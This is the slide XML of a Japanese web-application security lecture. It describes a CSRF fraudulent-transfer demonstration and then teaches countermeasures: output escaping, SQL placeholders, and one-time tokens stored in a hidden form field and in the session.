              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91BBE7BB-F54E-F8A5-E1CD-4592A83CD5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2194968" y="2866629"/>
            <a:ext cx="7802064" cy="2715004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1738822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5503A3-8BBF-1051-6487-8FD9A1E09F15}"/>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5639AC0A-7B84-73D4-CC10-DFD11B9DFE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「景品</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>！！」をクリック</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B07113-65DF-CC29-95C0-523393E62CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815149" y="2915386"/>
            <a:ext cx="6561701" cy="2927153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160679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EEB86D-E82D-0522-73C7-DC6C8C9EE0ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>今までの講座についての補足</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF10FC0-D497-119E-919D-B4BA1AA7DCFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>章まででは外部から入力されたものやデータベースから情報を取得してレスポンスをする文字列に載せる際に必ず</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文字列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と記述していたことや、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用いるときにプレースホルダを毎回使用していた理由は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最低限しないといけないセキュリティ対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>である。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4942313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A6F42-0E9E-12B8-13AC-E6BA547CDAE7}"/>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2F934C87-0720-44C7-A5D0-F4B81488F8AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正送金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>結果：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>意図しない振込が確認できる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865160E-2AAE-88D7-9326-C655E855B921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589299" y="2907187"/>
            <a:ext cx="7013401" cy="3017521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11777292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1AB30C-0C46-FA61-959F-ABABD620AC0F}"/>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E42CEB67-5424-06A4-3630-56F3CA9E7B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4932984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>では外部サイトが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパラメータさえ知っていれば誰でもアクセスできることが根本的な原因である。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>そこで正常サイトの送信前ページで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグを追加し</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でワンタイムトークンを発行してセッションにも同じ文字列を入れる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>送信後のページでセッションとパラメータの値を照合して合致した場合のみ処理を行う。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12422521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A8A7B-2E1C-93F3-AD05-97CFFE0C05AF}"/>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5C9B95F6-E224-1670-B63B-BE158B222945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ライブラリのインポート</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C779EB-388E-439D-15DE-F5CDD1CF74B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761520" y="3134398"/>
            <a:ext cx="8668960" cy="1733792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536D9178-F75F-4245-899A-5D3B89878A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="4001294"/>
            <a:ext cx="1749287" cy="276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EB61A52-2D9D-3584-17DA-5E1B41411D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047214" y="4102873"/>
            <a:ext cx="5262979"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セッション発行のため元々インポートしているが</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグでワンタイムトークンを発行する</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2267623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950FC1-0EDE-8658-DE03-A4B4C452F4CB}"/>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082379E5-4027-2390-32D1-F69EDCB448A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力画面と送金確定画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C080585A-0CB1-1A54-05F0-5FA9EDDC6B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697480" y="2907380"/>
            <a:ext cx="6797040" cy="3766979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3833900-4196-5627-41D4-F11992D98296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5263764" y="2801937"/>
            <a:ext cx="4618572"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dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>進数のワンタイムトークンを発行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグとセッションに入れる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="テキスト ボックス 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBFE030-CE1C-151C-2250-FDAAE277EFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956647" y="4324051"/>
            <a:ext cx="3416320"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セッションとのトークンの値と</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クエリパラメータの値で照合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="815560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9563ED-F1BF-35DA-9DEF-DCC2EC11AB23}"/>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55D98218-616D-BD44-6922-F2803759A94C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158FC97A-EB33-895E-2FC7-6B50F1C44BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2849129"/>
            <a:ext cx="10515600" cy="2649536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="正方形/長方形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C610A95-A46F-CF3C-1D82-2FF92C78A6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305878" y="4715123"/>
            <a:ext cx="6456459" cy="270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9015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6700B-0072-0856-ADE8-ABA77C857C35}"/>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3E31BD2E-6B0F-CE44-DA3D-3FF3343946CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ログイン後に必要な項目を入力</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422882FD-B96C-E2DB-85D2-62C6AA02DCA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2819204"/>
            <a:ext cx="10515600" cy="3826099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1054904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D83D6-4F47-1B1F-72BE-B9047B6187F6}"/>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2A5F78F1-23C8-65CA-6845-B535C3CA3B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
